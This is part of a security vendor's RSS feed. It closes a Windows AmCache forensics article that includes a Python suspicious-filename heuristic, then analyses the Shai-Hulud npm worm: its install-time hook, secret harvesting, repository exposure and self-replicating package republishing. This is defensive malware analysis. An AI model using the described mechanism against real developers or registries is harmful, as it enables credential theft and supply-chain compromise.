https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-800x154.png 800w" sizes="auto, (max-width: 1586px) 100vw, 1586px" /></a><p id="caption-attachment-117636" class="wp-caption-text">InventoryApplicationShortcut key</p></div>
  1564. <h4 id="inventoryapplicationshortcut-use-case-example-confirming-use-of-a-removed-app">InventoryApplicationShortcut – use case example: confirming use of a removed app</h4>
  1565. <p>You find that a suspicious program was deleted from the computer, but the user claims they never ran it. The <code>InventoryApplicationShortcut</code> key shows a shortcut to that program was on their desktop and was accessed recently. With supplementary evidence, such as that from Prefetch analysis, you can confirm the execution of the software.</p>
  1566. <h2 id="amcache-key-comparison">AmCache key comparison</h2>
  1567. <p>The table below summarizes the information presented in the previous subsections, highlighting the main information about each AmCache key.</p>
  1568. <table>
  1569. <tbody>
  1570. <tr>
  1571. <td><strong>Key</strong></td>
  1572. <td><strong>Contains</strong></td>
  1573. <td><strong>Indicates execution?</strong></td>
  1574. </tr>
  1575. <tr>
  1576. <td>InventoryApplicationFile</td>
  1577. <td>Metadata for all executables seen on the system.</td>
  1578. <td>Possibly (presence = likely executed)</td>
  1579. </tr>
  1580. <tr>
  1581. <td>InventoryApplication</td>
  1582. <td>Metadata about formally installed software.</td>
  1583. <td>No (indicates installation, not necessarily execution)</td>
  1584. </tr>
  1585. <tr>
  1586. <td>InventoryDriverBinary</td>
  1587. <td>Metadata about loaded kernel-mode drivers.</td>
  1588. <td>Yes (driver was loaded into memory)</td>
  1589. </tr>
  1590. <tr>
  1591. <td>InventoryApplicationShortcut</td>
  1592. <td>Information about .lnk files.</td>
  1593. <td>Possibly (combine with other data for confirmation)</td>
  1594. </tr>
  1595. </tbody>
  1596. </table>
  1597. <h2 id="amcache-evilhunter">AmCache-EvilHunter</h2>
  1598. <p>Undoubtedly, <code>Amcache.hve</code> is a very important forensic artifact. However, we could not find any tool that effectively parses its contents while providing threat intelligence for the analyst. With this in mind, we developed <a href="https://github.com/cristianzsh/amcache-evilhunter" target="_blank" rel="noopener">AmCache-EvilHunter</a>, a command-line tool to parse and analyze Windows <code>Amcache.hve</code> registry hives, identify evidence of execution and suspicious executables, and integrate Kaspersky OpenTIP and VirusTotal lookups for enhanced threat intelligence.</p>
  1599. <p>AmCache-EvilHunter is capable of processing the <code>Amcache.hve</code> file and filtering records by date range (with the options <code>--start</code> and <code>--end</code>). It is also possible to search records using keywords (<code>--search</code>), which is useful for searching for known naming conventions adopted by attackers. The results can be saved in CSV (<code>--csv</code>) or JSON (<code>--json</code>) format.</p>
  1600. <p>The image below shows an example run of AmCache-EvilHunter with these basic options, using the following command:</p><pre class="urvanov-syntax-highlighter-plain-tag">amcache-evilhunter -i Amcache.hve --start 2025-06-19 --end 2025-06-19 --csv output.csv</pre><p>
  1601. The output contains all applications that were present on the machine on June 19, 2025. The last column indicates whether or not the file is an operating system component.</p>
  1602. <div id="attachment_117638" style="width: 1352px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117638" class="size-full wp-image-117638" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14.png" alt="Basic usage of AmCache-EvilHunter" width="1342" height="370" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14.png 1342w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-300x83.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-1024x282.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-768x212.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-1269x350.png 1269w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-740x204.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-1016x280.png 1016w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213455/amcache-forensic-artifact14-800x221.png 800w" sizes="auto, (max-width: 1342px) 100vw, 1342px" /></a><p id="caption-attachment-117638" class="wp-caption-text">Basic usage of AmCache-EvilHunter</p></div>
  1603. <div id="attachment_117639" style="width: 1350px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117639" class="size-full wp-image-117639" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15.png" alt="CSV result" width="1340" height="268" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15.png 1340w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15-300x60.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15-1024x205.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15-768x154.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15-740x148.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213535/amcache-forensic-artifact15-800x160.png 800w" sizes="auto, (max-width: 1340px) 100vw, 1340px" /></a><p id="caption-attachment-117639" class="wp-caption-text">CSV result</p></div>
  1604. <p>Analysts are often faced with a large volume of executables and artifacts. To narrow down the scope and reduce noise, the tool is able to search for known suspicious binaries with the <code>--find-suspicious</code> option. The patterns used by the tool include common malware names, Windows process names containing small typos (e.g., <code>scvhost.exe</code>), legitimate executables usually found in use during incidents, one-letter/one-digit file names (such as <code>1.exe</code>, <code>a.exe</code>), and random hex strings. The figure below shows the results obtained by using this option; as highlighted, one <code>svchost.exe</code> file is part of the operating system and the other is not, making the latter a good candidate for collection and analysis if it has not been deleted.</p>
  1605. <div id="attachment_117640" style="width: 1351px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117640" class="size-full wp-image-117640" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16.png" alt="Suspicious files identification" width="1341" height="235" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16.png 1341w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16-300x53.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16-1024x179.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16-768x135.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16-740x130.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213814/amcache-forensic-artifact16-800x140.png 800w" sizes="auto, (max-width: 1341px) 100vw, 1341px" /></a><p id="caption-attachment-117640" class="wp-caption-text">Suspicious files identification</p></div>
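As an added illustration (not AmCache-EvilHunter's own code, and with constructed name lists and records), the heuristics listed above can be expressed as follows, using a transposition-aware edit distance so that <code>scvhost.exe</code> is one step from <code>svchost.exe</code>. The records are assumed to expose the <code>LowerCaseLongPath</code> and <code>IsOsComponent</code> values.

```python
import re

# Constructed pattern sets for this example; the tool's own lists are not
# reproduced here. All comparisons are done on lowercase names.
WINDOWS_PROCESSES = {
    "svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe", "winlogon.exe",
    "services.exe", "spoolsv.exe", "conhost.exe", "rundll32.exe", "dllhost.exe",
}
DUAL_USE_TOOLS = {"psexec.exe", "anydesk.exe", "winscp.exe", "procdump.exe"}
ONE_CHAR_NAME = re.compile(r"^[a-z0-9]\.exe$")
HEX_NAME = re.compile(r"^[0-9a-f]{8,}\.exe$")


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert/delete/substitute plus one
    step for swapping two adjacent characters (catches 'scvhost')."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def suspicious_reasons(record: dict) -> list:
    """Apply the name heuristics to one InventoryApplicationFile-style record
    (assumed fields: LowerCaseLongPath, IsOsComponent)."""
    path = record["LowerCaseLongPath"].lower()
    name = path.rsplit("\\", 1)[-1]
    reasons = []
    if name in WINDOWS_PROCESSES:
        # The real binary is an OS component; a copy elsewhere is not.
        if not record.get("IsOsComponent", False):
            reasons.append(f"{name} is a Windows process name but not an OS component")
    else:
        for real in sorted(WINDOWS_PROCESSES):
            if osa_distance(name, real) == 1:
                reasons.append(f"looks like a typo of {real}")
                break
    if name in DUAL_USE_TOOLS:
        reasons.append("legitimate tool frequently seen during incidents")
    if ONE_CHAR_NAME.match(name):
        reasons.append("one-letter/one-digit file name")
    if HEX_NAME.match(name):
        reasons.append("random-looking hex file name")
    return reasons


def find_suspicious(records: list) -> dict:
    """Return {lowercase path: [reasons]} for records tripping any heuristic."""
    hits = {}
    for rec in records:
        reasons = suspicious_reasons(rec)
        if reasons:
            hits[rec["LowerCaseLongPath"].lower()] = reasons
    return hits


# Constructed sample records (not real AmCache data).
SAMPLE_RECORDS = [
    {"LowerCaseLongPath": r"c:\windows\system32\svchost.exe", "IsOsComponent": True},
    {"LowerCaseLongPath": r"c:\users\public\svchost.exe", "IsOsComponent": False},
    {"LowerCaseLongPath": r"c:\users\alice\appdata\local\temp\scvhost.exe", "IsOsComponent": False},
    {"LowerCaseLongPath": r"c:\users\alice\downloads\winscp.exe", "IsOsComponent": False},
    {"LowerCaseLongPath": r"c:\programdata\1.exe", "IsOsComponent": False},
    {"LowerCaseLongPath": r"c:\users\alice\appdata\roaming\9f3a7c21e0b4.exe", "IsOsComponent": False},
    {"LowerCaseLongPath": r"c:\program files\winrar\winrar.exe", "IsOsComponent": False},
]

if __name__ == "__main__":
    for path, reasons in find_suspicious(SAMPLE_RECORDS).items():
        print(path, "->", "; ".join(reasons))
```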
  1606. <p>Malicious files usually do not include any publisher information and are definitely not part of the default operating system. For this reason, AmCache-EvilHunter also ships with the <code>--missing-publisher</code> and <code>--exclude-os</code> options. These parameters allow for easy filtering of suspicious binaries and also allow fast threat intelligence gathering, which is crucial during an incident.</p>
  1607. <p>Another important feature that distinguishes our tool from other proposed approaches is that AmCache-EvilHunter can query Kaspersky OpenTIP (<code>--opentip</code>) and VirusTotal (<code>--vt</code>) for hashes it identifies. In this way, analysts can rapidly gain insights into samples to decide whether they are going to proceed with a full analysis of the artifact or not.</p>
  1608. <div id="attachment_117641" style="width: 1349px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117641" class="size-full wp-image-117641" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17.jpeg" alt="Threat intel lookup" width="1339" height="182" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17.jpeg 1339w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17-300x41.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17-1024x139.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17-768x104.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17-740x101.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30213952/amcache-forensic-artifact17-800x109.jpeg 800w" sizes="auto, (max-width: 1339px) 100vw, 1339px" /></a><p id="caption-attachment-117641" class="wp-caption-text">Threat intel lookup</p></div>
  1609. <p>Binaries of the tool are available on <a href="https://github.com/cristianzsh/amcache-evilhunter/releases/" target="_blank" rel="noopener">our GitHub page</a> for both Linux and Windows systems.</p>
  1610. <h2 id="conclusion">Conclusion</h2>
  1611. <p><code>Amcache.hve</code> is a cornerstone of Windows forensics, capturing rich metadata, such as full paths, SHA-1 hashes, compilation timestamps, publisher and version details, for every executable that appears on a system. While it does not serve as a definitive execution log, its strength lies in documenting file presence and paths, making it invaluable for spotting anomalous binaries, verifying trustworthiness via hash lookups against threat‐intelligence feeds, and correlating <code>LinkDate</code> values with known attack campaigns.</p>
  1612. <p>To extract its full investigative potential, analysts should merge AmCache data with other artifacts (e.g., Prefetch, ShimCache, and Windows event logs) to confirm actual execution and build accurate timelines. Comparing <code>InventoryApplicationFile</code> entries against <code>InventoryApplication</code> reveals whether a file was merely dropped or formally installed, and identifying unexpected driver records can expose stealthy rootkits and persistence mechanisms. Leveraging parsers like AmCache-EvilHunter and cross-referencing against VirusTotal or proprietary threat databases allows IOC generation and robust incident response, making AmCache analysis a fundamental DFIR skill.</p>
  1613. ]]></content:encoded>
  1614. <wfw:commentRss>https://securelist.com/amcache-forensic-artifact/117622/feed/</wfw:commentRss>
  1615. <slash:comments>0</slash:comments>
  1616. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/01111328/SL-AmCache-forensic-artifact-featured.jpg" width="2000" height="955"><media:keywords>full</media:keywords></media:content>
  1617. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/01111328/SL-AmCache-forensic-artifact-featured-1024x489.jpg" width="1024" height="489"><media:keywords>large</media:keywords></media:content>
  1618. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/01111328/SL-AmCache-forensic-artifact-featured-300x143.jpg" width="300" height="143"><media:keywords>medium</media:keywords></media:content>
  1619. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/01111328/SL-AmCache-forensic-artifact-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1620. </item>
  1621. <item>
  1622. <title>Massive npm infection: the Shai-Hulud worm and patient zero</title>
  1623. <link>https://securelist.com/shai-hulud-worm-infects-500-npm-packages-in-a-supply-chain-attack/117547/</link>
  1624. <comments>https://securelist.com/shai-hulud-worm-infects-500-npm-packages-in-a-supply-chain-attack/117547/#respond</comments>
  1625. <dc:creator><![CDATA[Vladimir Gursky, Dmitry Vinogradov]]></dc:creator>
  1626. <pubDate>Thu, 25 Sep 2025 10:00:12 +0000</pubDate>
  1627. <category><![CDATA[Incidents]]></category>
  1628. <category><![CDATA[Malware descriptions]]></category>
  1629. <category><![CDATA[Malware Technologies]]></category>
  1630. <category><![CDATA[Linux]]></category>
  1631. <category><![CDATA[Microsoft Windows]]></category>
  1632. <category><![CDATA[JavaScript]]></category>
  1633. <category><![CDATA[Apple MacOS]]></category>
  1634. <category><![CDATA[Malware Descriptions]]></category>
  1635. <category><![CDATA[Malware]]></category>
  1636. <category><![CDATA[Worm]]></category>
  1637. <category><![CDATA[Supply-chain attack]]></category>
  1638. <category><![CDATA[Data theft]]></category>
  1639. <category><![CDATA[Open source]]></category>
  1640. <category><![CDATA[GitHub]]></category>
  1641. <category><![CDATA[npm]]></category>
  1642. <category><![CDATA[Windows malware]]></category>
  1643. <category><![CDATA[Unix and macOS malware]]></category>
  1644. <category><![CDATA[Web threats]]></category>
  1645. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117547</guid>
  1646.  
  1647. <description><![CDATA[We dissect a recent incident where npm packages with millions of downloads were infected by the Shai-Hulud worm. Kaspersky experts describe the starting point for the source of the infection.]]></description>
  1648. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/25072805/shai-hulud-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
<p>The modern development world is almost entirely dependent on third-party modules. While this certainly speeds up development, it also creates a massive attack surface for end users, since anyone can publish such components. It is no surprise that malicious modules are becoming more common. When the account of a maintainer of popular modules, or a single widely used dependency, is compromised, the result can quickly turn into a <a href="https://securelist.com/ksb-story-of-the-year-2024/114883/" target="_blank" rel="noopener">supply chain attack</a>. Such compromises are now a frequent attack vector among threat actors. In the last month alone, there have been two major incidents that confirm this interest in creating malicious modules, dependencies, and packages. We have already discussed the <a href="https://www.kaspersky.com/blog/npm-packages-trojanized/54280/" target="_blank" rel="noopener">recent compromise</a> of popular npm packages. On September 16, 2025, <a href="https://www.kaspersky.com/blog/tinycolor-shai-hulud-supply-chain-attack/54315/" target="_blank" rel="noopener">reports</a> emerged of a new wave of npm package infections, caused by the self-propagating malware known as Shai-Hulud.</p>
<p>Shai-Hulud is designed to steal sensitive data, expose private repositories of organizations, and hijack victim credentials to infect other packages and spread further. Over 500 packages were infected in this incident, including one with more than two million weekly downloads. As a result, developers who integrated these malicious packages into their projects risk losing sensitive data, and their own libraries could become infected with Shai-Hulud. This self-propagating malware takes over accounts and steals secrets to create new infected modules, spreading the threat along the dependency chain.</p>
  1651. <h2 id="technical-details">Technical details</h2>
<p>The worm&#8217;s malicious code executes when an infected package is installed; it then publishes infected releases of every package the victim has permission to update.</p>
<p>Once the infected package is installed from the npm registry on the victim&#8217;s system, an install-time lifecycle script is executed automatically. This script launches a malicious JavaScript file over 3 MB in size named <code>bundle.js</code>, which bundles several legitimate open-source modules together with the worm&#8217;s own code.</p>
  1654. <p>Key modules within <code>bundle.js</code> include:</p>
  1655. <ul>
  1656. <li>Library for interacting with AWS cloud services</li>
  1657. <li>GCP module that retrieves metadata from the Google Cloud Platform environment</li>
  1658. <li>Functions for <a href="https://github.com/trufflesecurity/trufflehog" target="_blank" rel="noopener">TruffleHog</a>, a tool for scanning various data sources to find sensitive information, specifically secrets</li>
  1659. <li>Tool for interacting with the GitHub API</li>
  1660. </ul>
  1661. <p>The JavaScript file also contains network utilities for data transfer and the main operational module, Shai-Hulud.</p>
  1662. <p>The worm begins its malicious activity by collecting information about the victim&#8217;s operating system and checking for an npm token and authenticated GitHub user token in the environment. If a valid GitHub token is not present, <code>bundle.js</code> will terminate. A distinctive feature of Shai-Hulud is that most of its functionality is geared toward Linux and macOS systems: almost all malicious actions are performed exclusively on these systems, with the exception of using TruffleHog to find secrets.</p>
  1663. <h3 id="exfiltrating-secrets">Exfiltrating secrets</h3>
  1664. <p>After passing the checks, the malware uses the token mentioned earlier to get information about the current GitHub user. It then runs the <code>extraction</code> function, which creates a temporary executable bash script at <code>/tmp/processor.sh</code> and runs it as a separate process, passing the token as an argument. Below is the <code>extraction</code> function, with strings and variable names modified for readability since the original source code was illegible.</p>
  1665. <div id="attachment_117553" style="width: 560px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155009/shai-hulud1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117553" class="size-full wp-image-117553" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155009/shai-hulud1.png" alt="The extraction function, formatted for readability" width="550" height="533" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155009/shai-hulud1.png 550w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155009/shai-hulud1-300x291.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155009/shai-hulud1-361x350.png 361w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155009/shai-hulud1-289x280.png 289w" sizes="auto, (max-width: 550px) 100vw, 550px" /></a><p id="caption-attachment-117553" class="wp-caption-text">The extraction function, formatted for readability</p></div>
<p>The bash script communicates with the GitHub API and collects secrets from the victim&#8217;s repositories in an unconventional way. First, it checks whether the token has the permissions needed to create branches and work with GitHub Actions. If it does, the script retrieves the list of all repositories accessible to the user, filtered to those from 2025. In each of them, it creates a new branch named <code>shai-hulud</code> and commits a <code>shai-hulud-workflow.yml</code> <a href="https://docs.github.com/en/actions/concepts/workflows-and-actions/workflows" target="_blank" rel="noopener">workflow</a> file. Workflow files define the automation jobs that GitHub Actions runs in response to repository events; the Shai-Hulud workflow is configured to run on every push.</p>
  1667. <div id="attachment_117554" style="width: 694px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155101/shai-hulud2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117554" class="size-full wp-image-117554" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155101/shai-hulud2.png" alt="The malicious workflow configuration" width="684" height="233" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155101/shai-hulud2.png 684w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155101/shai-hulud2-300x102.png 300w" sizes="auto, (max-width: 684px) 100vw, 684px" /></a><p id="caption-attachment-117554" class="wp-caption-text">The malicious workflow configuration</p></div>
  1668. <p>This file collects secrets from the victim&#8217;s repositories and forwards them to the attackers&#8217; server. Before being sent, the confidential data is encoded twice with Base64.</p>
<p>This unusual method of data collection is designed for a one-time extraction of secrets from a user&#8217;s repositories. However, it poses a threat not only to Shai-Hulud victims but also to ordinary researchers: searching GitHub for &#8220;shai-hulud&#8221; returns numerous repositories that have been compromised by the worm.</p>
  1670. <div id="attachment_117555" style="width: 1160px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117555" class="size-full wp-image-117555" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3.png" alt="Open GitHub repositories compromised by Shai-Hulud" width="1150" height="756" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3.png 1150w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-300x197.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-1024x673.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-768x505.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-532x350.png 532w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-740x486.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-426x280.png 426w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155148/shai-hulud3-800x526.png 800w" sizes="auto, (max-width: 1150px) 100vw, 1150px" /></a><p id="caption-attachment-117555" class="wp-caption-text">Open GitHub repositories compromised by Shai-Hulud</p></div>
  1671. <p>The main <code>bundle.js</code> script then requests a list of all organizations associated with the victim and runs the migration function for each one. This function also runs a bash script, but in this case, it saves it to <code>/tmp/migrate-repos.sh</code>, passing the organization name, username, and token as parameters for further malicious activity.</p>
  1672. <p>The bash script automates the migration of all private and internal repositories from the specified GitHub organization to the user&#8217;s account, making them public. The script also uses the GitHub API to copy the contents of the private repositories as <a href="https://docs.github.com/en/repositories/creating-and-managing-repositories/duplicating-a-repository" target="_blank" rel="noopener">mirrors</a>.</p>
  1673. <p>We believe these actions are intended for the automated theft of source code from the private repositories of popular communities and organizations. For example, the well-known company CrowdStrike was caught in this wave of infections.</p>
  1674. <h3 id="the-worms-self-replication">The worm&#8217;s self-replication</h3>
  1675. <p>After running operations on the victim&#8217;s GitHub, the main <code>bundle.js</code> script moves on to its next crucial stage: self-replication. First, the script gets a list of the victim&#8217;s 20 most downloaded packages. To do this, it performs a search query with the username from the previously obtained npm token:</p><pre class="urvanov-syntax-highlighter-plain-tag">https://registry.npmjs.org/-/v1/search?text=maintainer:{%user_details%}&amp;size=20</pre><p> </p>
<p>Next, for each of the packages it finds, it calls the <code>updatePackage</code> function. This function first attempts to download the package tarball (a gzipped tar archive, <code>.tgz</code>). If it exists, a temporary directory named <code>npm-update-{target_package_name}</code> is created. The tarball is saved there as <code>package.tgz</code>, then unpacked and modified as follows:</p>
  1677. <ul>
  1678. <li>The malicious <code>bundle.js</code> is added to the original package.</li>
  1679. <li>A postinstall command is added to the <code>package.json</code> file (which is used in Node.js projects to manage dependencies and project metadata). This command is configured to execute the malicious script via <code>node bundle.js</code>.</li>
<li>The patch component of the package version is incremented by 1, so the infected release looks like a routine bugfix update.</li>
  1681. </ul>
  1682. <p>The modified package is then re-packed and published to npm as a new version with the <code>npm publish</code> command. After this, the temporary directory for the package is cleared.</p>
  1683. <div id="attachment_117556" style="width: 687px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155303/shai-hulud4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117556" class="size-full wp-image-117556" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155303/shai-hulud4.png" alt="The updatePackage function, formatted for readability" width="677" height="771" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155303/shai-hulud4.png 677w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155303/shai-hulud4-263x300.png 263w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155303/shai-hulud4-307x350.png 307w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/24155303/shai-hulud4-246x280.png 246w" sizes="auto, (max-width: 677px) 100vw, 677px" /></a><p id="caption-attachment-117556" class="wp-caption-text">The updatePackage function, formatted for readability</p></div>
  1684. <h3 id="uploading-secrets-to-github">Uploading secrets to GitHub</h3>
<p>Next, the worm uses the previously mentioned TruffleHog utility to harvest secrets from the target system. It downloads the latest version of the utility from the original repository for the specific operating system type using the following link:</p><pre class="urvanov-syntax-highlighter-plain-tag">https://github.com/trufflesecurity/trufflehog/releases/download/{utility version}/{OS-specific file}</pre>
  1686. <p>The worm also uses modules for AWS and Google Cloud Platform (GCP) to scan for secrets. The script then aggregates the collected data into a single object and creates a repository named &#8220;Shai-Hulud&#8221; in the victim&#8217;s profile. It then uploads the collected information to this repository as a <code>data.json</code> file.</p>
<p>Below is the structure of the <code>data.json</code> file uploaded to GitHub, with the collected values redacted:</p><pre class="urvanov-syntax-highlighter-plain-tag">{
  "application": {
    "name": "",
    "version": "",
    "description": ""
  },
  "system": {
    "platform": "",
    "architecture": "",
    "platformDetailed": "",
    "architectureDetailed": ""
  },
  "runtime": {
    "nodeVersion": "",
    "platform": "",
    "architecture": "",
    "timestamp": ""
  },
  "environment": {
  },
  "modules": {
    "github": {
      "authenticated": false,
      "token": "",
      "username": {}
    },
    "aws": {
      "secrets": []
    },
    "gcp": {
      "secrets": []
    },
    "truffleHog": {
      "available": false,
      "installed": false,
      "version": "",
      "platform": "",
      "results": [
        {}
      ]
    },
    "npm": {
      "token": "",
      "authenticated": true,
      "username": ""
    }
  }
}</pre>
  1735. <h3 id="infection-characteristics">Infection characteristics</h3>
  1736. <p>A distinctive characteristic of the modified packages is that they contain an archive named <code>package.tar</code>. This is worth noting because packages usually contain an archive with a name that matches the package itself.</p>
  1737. <p>Through our research, we were able to identify the first package from which Shai-Hulud began to spread, thanks to a key difference. As we mentioned earlier, after infection, a postinstall command to execute the malicious script, <code>node bundle.js</code>, is written to the <code>package.json</code> file. This command typically runs immediately after installation. However, we discovered that one of the infected packages listed the same command as a preinstall command, meaning it ran before the installation. This package was <strong>ngx-bootstrap version 18.1.4</strong>. We believe this was the starting point for the spread of this infection. This hypothesis is further supported by the fact that the archive name in the first infected version of this package differed from the name characteristic of later infected packages (<code>package.tar</code>).</p>
  1738. <p>While investigating different packages, we noticed that in some cases, a single package contained multiple versions with malicious code. This was likely possible because the infection spread to all maintainers and contributors of packages, and the malicious code was then introduced from each of their accounts.</p>
  1739. <h2 id="infected-libraries-and-crowdstrike">Infected libraries and CrowdStrike</h2>
<p>The rapidly spreading Shai-Hulud worm has infected over 500 popular packages that organizations and developers use daily, including libraries published by the well-known company CrowdStrike. Among the infected libraries were the following:</p>
  1742. <ul>
  1743. <li>@crowdstrike/commitlint versions 8.1.1, 8.1.2</li>
  1744. <li>@crowdstrike/falcon-shoelace versions 0.4.1, 0.4.2</li>
